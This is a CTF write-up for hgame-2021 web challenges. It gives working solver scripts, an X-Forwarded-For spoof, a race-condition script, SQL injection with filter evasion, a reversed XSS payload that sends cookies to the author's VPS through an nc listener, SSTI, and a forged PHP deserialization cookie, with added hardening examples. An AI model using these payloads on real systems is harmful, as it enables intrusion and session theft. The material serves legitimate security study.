hgame-2021

week1 - 智商检测鸡 (IQ Test Chicken)


A script to fetch and compute the definite integrals (py2 never got the right answer; only py3 worked) is as follows

#! /usr/bin/python3
# -*- coding: utf-8 -*-
import requests
import re
#{"question":"<math><mrow><msubsup><mo>\u222b</mo><mrow>
#<mo>-</mo><mn>92</mn></mrow><mrow><mn>31</mn></mrow>
#</msubsup><mo>(</mo><mn>12</mn><mi>x</mi><mo>+</mo><mn>17</mn>
#<mo>)</mo><mtext><mi>d</mi></mtext><mi>x</mi><mtd/></mrow></math>"}

session = requests.session()
url1 = 'http://r4u.top:5000/api/getQuestion'
url2 = 'http://r4u.top:5000/api/verify'
cookie = {'session':'eyJzb2x2aW5nIjowfQ.YCO0Rg.GB0csnF1HSr6v9-rMHaA9O72POI'}

i = 0
while i < 103:
    html1 = requests.get(url1, cookies=cookie).text
    # The <mn> nodes appear in order: lower bound (its '-' sign is a separate
    # <mo>, so it is negated here), upper bound, then a and b of a*x + b
    x2 = int(re.findall(r'<mn>(.*?)</mn>', html1)[0]) * -1
    x1 = int(re.findall(r'<mn>(.*?)</mn>', html1)[1])
    a = int(re.findall(r'<mn>(.*?)</mn>', html1)[2])
    b = int(re.findall(r'<mn>(.*?)</mn>', html1)[3])
    # Antiderivative a/2*x^2 + b*x evaluated between x2 and x1. a/2 is float
    # division in py3 but integer division in py2, hence the py2 failure
    answer = a/2*x1*x1 + b*x1 - a/2*x2*x2 - b*x2
    answer = round(answer, 3)
    #print(answer)
    data = {"answer": answer}
    #print(data)
    r1 = requests.post(url2, json=data, cookies=cookie)
    #print(r1.content)
    # Use the cookies set by the verify response for the next round
    cookie = requests.utils.dict_from_cookiejar(r1.cookies)
    status = requests.get('http://r4u.top:5000/api/getStatus', cookies=cookie).text
    print(status)
    #print(cookie)
    i += 1

It can also be done from the F12 console

document.getElementsByTagName("button")[0].onclick = function () {
    var r = document.getElementById("integral").querySelectorAll("mn");
    var l = -parseFloat(r[0].innerHTML);
    var u = parseFloat(r[1].innerHTML);
    var a = parseFloat(r[2].innerHTML);
    var b = parseFloat(r[3].innerHTML);
    document.getElementById("answer").value = (a * (u * u - l * l) / 2 + b * (u - l)).toString();
    submit();
};

Finally

hgame{3very0ne_H4tes_Math}

week1-Hitchhiking_in_the_Galaxy


Accessing /HitchhikerGuide.php with GET returns

<html>
<head><title>405 Method Not Allowed</title></head>
<body bgcolor="white">
<center>
<h1>405 Not Allowed</h1>
<p>顺风车不是这么搭的</p>
</center>
<hr>
<center>nginx/1.14.0 (Ubuntu)</center>
</body>
</html>

Changing the method to POST returns

只有使用"无限非概率引擎"(Infinite Improbability Drive)才能访问这里~

Change the UA to

User-Agent: Infinite Improbability Drive

It returns

你知道吗?<a href="https://github.com/wuhan005">茄子</a>特别要求:你得从他的<a href="https://cardinal.ink/">Cardinal</a>过来

Next, change the Referer

Referer: https://cardinal.ink/
//flag仅能通过本地访问获得

Add

X-Forwarded-For:127.0.0.1

hgame{s3Cret_0f_HitCHhiking_in_the_GAl@xy_i5_dOnT_p@nic!}

The final request

POST /HitchhikerGuide.php HTTP/1.1
Host: hitchhiker42.0727.site:42420
Upgrade-Insecure-Requests: 1
X-Forwarded-For:127.0.0.1
User-Agent: Infinite Improbability Drive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://cardinal.ink/
Accept-Language: zh-CN,zh;q=0.9
Connection: close
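The last gate above is defeated by a client-supplied X-Forwarded-For. The following is an added example, not code from the challenge, showing why a "local only" check that reads that header is bypassable and how a server should derive the client address instead; the function names and the TRUSTED_PROXIES address are assumptions.

```python
import ipaddress

# Constructed: address of the one reverse proxy that is allowed to append XFF
TRUSTED_PROXIES = {"10.0.0.5"}


def is_local_naive(headers):
    """Mirror of the challenge's check: believes whatever the client sends."""
    return headers.get("X-Forwarded-For", "").split(",")[0].strip() == "127.0.0.1"


def client_ip(remote_addr, headers, trusted=TRUSTED_PROXIES):
    """Walk X-Forwarded-For right-to-left, discarding only hops we trust.

    The first address that is NOT a trusted proxy is the real client; every
    entry to its left was supplied by the client and must be ignored.
    """
    if remote_addr not in trusted:
        return remote_addr          # direct connection: XFF is attacker-controlled
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if hop not in trusted:
            return hop
    return remote_addr


def is_local_hardened(remote_addr, headers):
    """Decide "local" from the socket peer plus trusted-proxy hops only."""
    try:
        return ipaddress.ip_address(client_ip(remote_addr, headers)).is_loopback
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed request: a remote client connects directly and forges XFF
    forged = {"X-Forwarded-For": "127.0.0.1"}
    print(is_local_naive(forged))                    # True: bypassed
    print(is_local_hardened("203.0.113.9", forged))  # False
```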

week2 - Liki的生日礼物 (Liki's Birthday Present)


The redemption page has a race condition; reference script

# -*- coding: utf-8 -*-
import threading
import requests
url = 'https://birthday.liki.link'
headers = { 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63', 'Cookie': 'PHPSESSID=10vh4i8m7tg5as1028budrfvot'}

def buy():
    data = {'amount': 1}
    requests.post(url=url + '/API/?m=buy', headers=headers, data=data)

def multithreading():
    # Fire 52 redemptions at once so several pass the balance check
    # before any of them has been debited
    threads = []
    for _ in range(52):
        t = threading.Thread(target=buy)
        t.start()
        threads.append(t)
    for thread in threads:
        thread.join()

if __name__ == '__main__':
    multithreading()

Liki非常开心并把flag给了你:hgame{L0ck_1s_TH3_S0lllut!on!!!}
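The flag text names the fix. As an added example (not the challenge's code), here is the same check-then-act redemption modelled locally, hammered by 52 threads with and without a lock; the Wallet class and hammer() helper are assumptions made for this illustration.

```python
import threading
import time


class Wallet:
    def __init__(self, balance, use_lock):
        self.balance = balance
        self.redeemed = 0
        self.lock = threading.Lock() if use_lock else None

    def _buy_unsafe(self, amount):
        # Time-of-check / time-of-use window: every thread can pass the check
        # before any of them has debited the balance
        if self.balance >= amount:
            time.sleep(0.01)
            self.balance -= amount
            self.redeemed += 1
            return True
        return False

    def buy(self, amount=1):
        if self.lock is None:
            return self._buy_unsafe(amount)
        with self.lock:                 # check and debit become one atomic step
            return self._buy_unsafe(amount)


def hammer(wallet, threads=52, amount=1):
    """Fire `threads` concurrent buy() calls, mirroring the writeup's script."""
    ts = [threading.Thread(target=wallet.buy, args=(amount,)) for _ in range(threads)]
    for t in ts:
        t.start()
    for t in ts:
        t.join()
    return wallet.redeemed, wallet.balance


if __name__ == "__main__":
    print("without lock:", hammer(Wallet(balance=1, use_lock=False)))  # usually oversold
    print("with lock:   ", hammer(Wallet(balance=1, use_lock=True)))   # (1, 0)
```

In a real application the lock is a database transaction with a row lock or an atomic conditional UPDATE, not an in-process mutex.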

week2-LazyDogR4U


The source is in www.zip

www
├── Config.php -- configuration definitions
├── User.php -- checks user login
├── config.ini -- not useful
├── flag.php -- shown below
├── index.php -- a user matching the one defined in Config can enter flag.php
├── lazy.php -- shown below
└── static
    └── style.css

1 directory, 7 files

The key file is flag.php

<?php
session_start();

require_once 'lazy.php';


if(!isset($_SESSION['username'])){
    die('您配吗?');
}
?>
<?php

if($_SESSION['username'] === 'admin'){
    echo "<h3 style='color: white'>admin将于今日获取自己忠实的flag</h3>";
    echo "<h3 style='color: white'>$flag</h3>";
}else{
    if($submit == "getflag"){
        echo "<h3 style='color: white'>{$_SESSION['username']}接近了问题的终点</h3>";
    }else{
        echo "<h3 style='color: white'>篡位者占领了神圣的页面</h3>";
    }
}
?>

Only the admin check stands between us and the flag, so now look at lazy.php

<?php
$filter = ["SESSION", "SEVER", "COOKIE", "GLOBALS"];

// Register all variables directly so I can type less, wuhu~

foreach(array('_GET','_POST') as $_request){
    foreach ($$_request as $_k => $_v){
        foreach ($filter as $youBadBad){
            $_k = str_replace($youBadBad, '', $_k);
        }
        ${$_k} = $_v;
    }
}


// Autoload classes, so I can type less here too, wuhu~
function auto($class_name){
    require_once $class_name . ".php";
}
spl_autoload_register('auto');

This allows variable overwriting: variables are taken from _GET and _POST, so for example _SESSION1=admin becomes _1=admin after filtering. Since str_replace makes only one pass, double-writing the banned word bypasses it, and the overwrite then sets $_SESSION['username'] to admin. The payload is as follows

url?_SESSSESSIONION[username]=admin

hgame{R4U_|$-A-l4zY~DoG}
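An added example (not from the challenge source) reproducing the single-pass filter from lazy.php in Python next to two hardened variants, so the double-write bypass and its fixes can be checked offline; the function names are assumptions. Note that the real fix is to stop registering request parameters as variables at all.

```python
import re

FILTER = ["SESSION", "SEVER", "COOKIE", "GLOBALS"]   # the list from lazy.php


def strip_once(key):
    """What lazy.php does: one replacement pass per banned word."""
    for bad in FILTER:
        key = key.replace(bad, "")
    return key


def strip_to_fixpoint(key):
    """Repeat until nothing changes, so a removed word cannot re-form a banned one."""
    while True:
        new = strip_once(key)
        if new == key:
            return new
        key = new


# Whitelist: a plain identifier, no leading underscore (keeps superglobals out)
SAFE_KEY = re.compile(r"^[A-Za-z][A-Za-z0-9]*$")


def accept_key(key):
    """Preferred fix: reject unexpected names instead of sanitising them."""
    if not SAFE_KEY.match(key) or key.upper() in FILTER:
        raise ValueError(f"rejected variable name: {key!r}")
    return key


if __name__ == "__main__":
    payload = "_SESSSESSIONION"          # the writeup's double-written key
    print(strip_once(payload))           # _SESSION -> would overwrite $_SESSION
    print(strip_to_fixpoint(payload))    # _
```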

week2-200OK!!


The Status header changes the response

GET /server.php HTTP/1.1
Host: 200ok.liki.link
Connection: close
Status: 4
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
sec-ch-ua: "Chromium";v="88", "Google Chrome";v="88", ";Not A Brand";v="99"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://200ok.liki.link/
Accept-Language: zh-CN,zh;q=0.9

HTTP/1.1 200 OK
Content-Length: 18
Content-Type: text/html; charset=UTF-8
Date: Sun, 21 Feb 2021 09:52:08 GMT
Server: Caddy
Server: Apache/2.4.29 (Ubuntu)
Connection: close

HTTP 403 Forbidden

* * * * * * * * * * * *

Status: 2

HTTP/1.1 200 OK
Content-Length: 20
Content-Type: text/html; charset=UTF-8
Date: Sun, 21 Feb 2021 09:52:33 GMT
Server: Caddy
Server: Apache/2.4.29 (Ubuntu)
Connection: close

HTTP 400 Bad Request

Probably injection; testing shows the filtered strings are

['select', 'SELECT', 'from', 'FROM', 'union', 'UNION', 'where', 'WHERE', ' ']
Changing the case bypasses it

-1'/***/uniOn/***/seLect/***/group_concat(table_name)/***/frOm/***/information_schema.tables/***/whEre/***/table_schema='week2sqli'#

//f1111111144444444444g,status


-1'/***/uniOn/***/seLect/***/group_concat(column_name)/***/frOm/***/information_schema.columns/**/whEre/**/table_name='f1111111144444444444g'#

//ffffff14gggggg


-1'/***/uniOn/***/seLect/***/ffffff14gggggg/***/frOm/***/f1111111144444444444g#

//hgame{Con9raTu1ati0n5+yoU_FXXK~Up-tH3,5Q1!!=)}

hgame{Con9raTu1ati0n5+yoU_FXXK~Up-tH3,5Q1!!=)}
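The blocklist above matches exact substrings, so mixed case and /**/ in place of spaces slip past it. As an added example (not from the challenge), the following shows that check beside the normalisation a detector would apply before keyword matching; the function names are assumptions, and parameterised queries remain the actual fix.

```python
import re

BLOCKLIST = ['select', 'SELECT', 'from', 'FROM', 'union', 'UNION', 'where', 'WHERE', ' ']
KEYWORDS = {"select", "from", "union", "where"}


def naive_filter_blocks(value):
    """The challenge's check: exact substring match against the list."""
    return any(bad in value for bad in BLOCKLIST)


def normalise(value):
    """Fold case, replace /* ... */ comments with a space, collapse whitespace."""
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    value = re.sub(r"\s+", " ", value)
    return value.lower()


def detect_sqli(value):
    """Flag input that contains SQL keywords once normalised."""
    tokens = set(re.findall(r"[a-z_]+", normalise(value)))
    return bool(tokens & KEYWORDS)


if __name__ == "__main__":
    # The writeup's first payload, as seen by the server
    payload = ("-1'/***/uniOn/***/seLect/***/group_concat(table_name)/***/frOm"
               "/***/information_schema.tables/***/whEre/***/table_schema='week2sqli'#")
    print(naive_filter_blocks(payload))   # False: slips through
    print(detect_sqli(payload))           # True
```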

week2-Post to zuckonit


XSS. The submitted script is output in reverse, and strings such as http and script are filtered. The http link can be replaced with //, which still resolves, and delivered through an img tag; reversing the payload in advance so that the reversed output becomes valid markup triggers the XSS, and a listener on a local port receives the admin token

<img src=x onerror="alert(1)">
returns
>")1(trela"=rorreon x=crs gmi<

Listen locally

nc -lk 8091

Final payload

>")eikooc.tnemucod+'/1908:spv//'(nepo.wodniw"=rorreno 'x'=crs gmi<on
Reversed, that is
no<img src='x' onerror="window.open('//vps:8091/'+document.cookie)">

The token arrives

GET /token=f7c30a3a5d9263d8c44476259ff7873764a1be04a9a45df8f92ae6b77b155acf HTTP/1.1
Host: url:8091
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: "WaterFox"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://159.75.113.183:7654/checker?contents[]=on%3Cimg%20src%3D%27x%27%20onerror%3D%22window.open%28%27//url%3A8091/%27%2Bdocument.cookie%29%22%3E&contents[]=on%3Cimg%20src%3D%27x%27%20onerror%3D%22window.open%28%27//url%3A8091/%27%2Bdocument.cookie%29%22%3E&contents[]=on%3Cimg%20src%3D%27x%27%20onerror%3D%22window.open%28%27//url%3A8091/%27%2Bdocument.cookie%29%22%3E&
Accept-Encoding: gzip, deflate
Accept-Language: en-US

Use the token to request /flag and obtain

GET /flag HTTP/1.1
Host: zuckonit.0727.site:7654
Cookie: token=f7c30a3a5d9263d8c44476259ff7873764a1be04a9a45df8f92ae6b77b155acf; session=a72bdd50-c3e4-4c0f-b6fd-9e578824ca75

hgame{X5s_t0GEt@dm1n’s_cOokies.}

week3-Forgetful


After registering and logging in there is a todolist feature: add a title, submit, and it can be previewed. Inserting the earlier script statement shows it is echoed back

<img src='x' //url:8091'+document.cookie)">

Given the challenge theme this should be Python SSTI.
Try

Hello {{7*7}}
returns
当前Todo: Hello 49

Echo the base classes

Reference link: Flask-SSTI注意事项以及一些POC (Flask SSTI notes and some PoCs)
Final construction

But at this point it returns

Stop!!!

Trying tac to read it backwards also returns Stop, and trying nc to the server got no response either; in the end the output was encoded

aGdhbWV7aDB3XzRib3U3K0wzYXJuIW5nflB5dGhPbl5Ob3c/fQo=

hgame{h0w_4bou7+L3arn!ng~PythOn^Now?}

week3-Arknights


The challenge has a git leak exposing the source

├── index.php
├── pool.php -- data pool
├── simulator.php -- main processing file
├── static
│   ├── css
│   │   ├── bootstrap.min.css
│   │   └── cover.css
│   └── img
│       └── bg.jpg

The key file is simulator.php; its code is as follows

<?php
class CardsPool
{

    private $file = '';

    public function __construct($filePath)
    {
        if (file_exists($filePath)) {
            $this->file = $filePath;
        } else {
            die("Cards pool file doesn't exist!");
        }
    }

    public function __toString(){
        return file_get_contents($this->file);
    }
}
class Eeeeeeevallllllll{
    public $msg="坏坏liki到此一游";

    public function __destruct()
    {
        echo $this->msg;
    }
}
class Session{

    private $sessionData;

    const SECRET_KEY = "7tH1PKviC9ncELTA1fPysf6NYq7z7IA9";

    public function __construct(){}

    public function set($key, $value){
        if(empty($key)){
            $this->sessionData[] = $value;
        }else{
            $this->sessionData[$key] = $value;
        }
    }

    public function getAll(){
        return $this->sessionData;
    }


    public function save(){

        $serialized = serialize($this->sessionData);
        $sign = base64_encode(md5($serialized . self::SECRET_KEY));
        $value = base64_encode($serialized) . "." . $sign;
        setcookie("session",$value);
    }


    public function extract($session){

        $sess_array = explode(".", $session);
        $data = base64_decode($sess_array[0]);
        $sign = base64_decode($sess_array[1]);

        if($sign === md5($data . self::SECRET_KEY)){
            $this->sessionData = unserialize($data);
        }else{
            unset($this->sessionData);
            die("Go away! You hacker!");
        }
    }
}

Here we can see how the session field we control is encoded and verified. By constructing an Eeeeeeevallllllll object whose __destruct echo triggers the __toString of a CardsPool object, we get a file read and thus the flag; SECRET_KEY is also handed to us in the source.

Reference link: PHP反序列化漏洞总结 (PHP deserialization vulnerability summary)
The final PoC is as follows

<?php
class CardsPool
{

    private $file = '';

    public function __construct($filePath)
    {
        if (file_exists($filePath)) {
            $this->file = $filePath;
        } else {
            die("Cards pool file doesn't exist!");
        }
    }

    public function __toString(){
        return file_get_contents($this->file);
    }
}
class Eeeeeeevallllllll{
    public $msg="坏坏liki到此一游";

    public function __destruct()
    {
        echo $this->msg;
    }
}

$SECRET_KEY = "7tH1PKviC9ncELTA1fPysf6NYq7z7IA9";
$a = new Eeeeeeevallllllll();
$b = new CardsPool('./flag.php');
$a->msg = $b;
$serialized = serialize($a);
$sign = base64_encode(md5($serialized . $SECRET_KEY));
$value = base64_encode($serialized) . "." . $sign;
echo $value;
?>

The generated payload

TzoxNzoiRWVlZWVlZXZhbGxsbGxsbGwiOjE6e3M6MzoibXNnIjtPOjk6IkNhcmRzUG9vbCI6MTp7czoxNToiAENhcmRzUG9vbABmaWxlIjtzOjEwOiIuL2ZsYWcucGhwIjt9fQ==.NjhlZTBkNGQyMTM4ZjNmYWU3ZDI2Y2QzYWQ1OTFkZWQ=

Set the cookie to the payload to obtain

hgame{XI-4Nd-n!AN-D0e5Nt_eX|5T~4t_ALL}
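As an added example (not the challenge's code), the Session::save()/extract() cookie scheme re-implemented in Python beside a hardened version: with the key in the leaked source any blob can be signed, and unserialize() of that blob is what fires the gadget chain, so the fix is signing plain data with an HMAC rather than hiding the key better. Function names are assumptions.

```python
import base64
import hashlib
import hmac
import json

LEAKED_KEY = b"7tH1PKviC9ncELTA1fPysf6NYq7z7IA9"   # SECRET_KEY from simulator.php


def challenge_sign(serialized: bytes, key: bytes = LEAKED_KEY) -> str:
    """Same layout as Session::save(): base64(data) . base64(md5(data . KEY))."""
    sign = hashlib.md5(serialized + key).hexdigest().encode()
    return base64.b64encode(serialized).decode() + "." + base64.b64encode(sign).decode()


def challenge_verify(cookie: str, key: bytes = LEAKED_KEY):
    """Mirror of Session::extract(): returns the bytes that would reach unserialize()."""
    data_b64, sign_b64 = cookie.split(".", 1)
    data = base64.b64decode(data_b64)
    if base64.b64decode(sign_b64) != hashlib.md5(data + key).hexdigest().encode():
        return None
    # Once the key is known, any attacker-chosen blob passes this check, and
    # unserialize() on it is what triggers __destruct/__toString
    return data


def hardened_sign(payload: dict, key: bytes) -> str:
    """Sign plain JSON data with an HMAC instead of serialised objects with md5."""
    data = json.dumps(payload, separators=(",", ":")).encode()
    tag = hmac.new(key, data, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(data).decode() + "." + base64.urlsafe_b64encode(tag).decode()


def hardened_verify(cookie: str, key: bytes):
    """Constant-time tag check, then json.loads: no object graph, so no gadget chain."""
    data_b64, tag_b64 = cookie.split(".", 1)
    data = base64.urlsafe_b64decode(data_b64)
    expected = hmac.new(key, data, hashlib.sha256).digest()
    if not hmac.compare_digest(base64.urlsafe_b64decode(tag_b64), expected):
        return None
    return json.loads(data)


if __name__ == "__main__":
    # Constructed blob standing in for the PoC's serialised object
    blob = b'O:17:"Eeeeeeevallllllll":1:{s:3:"msg";s:2:"hi";}'
    print(challenge_verify(challenge_sign(blob)) == blob)     # True: forgeable
    key = b"\x00" * 32                                        # constructed key
    print(hardened_verify(hardened_sign({"user": "guest"}, key), key))
```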
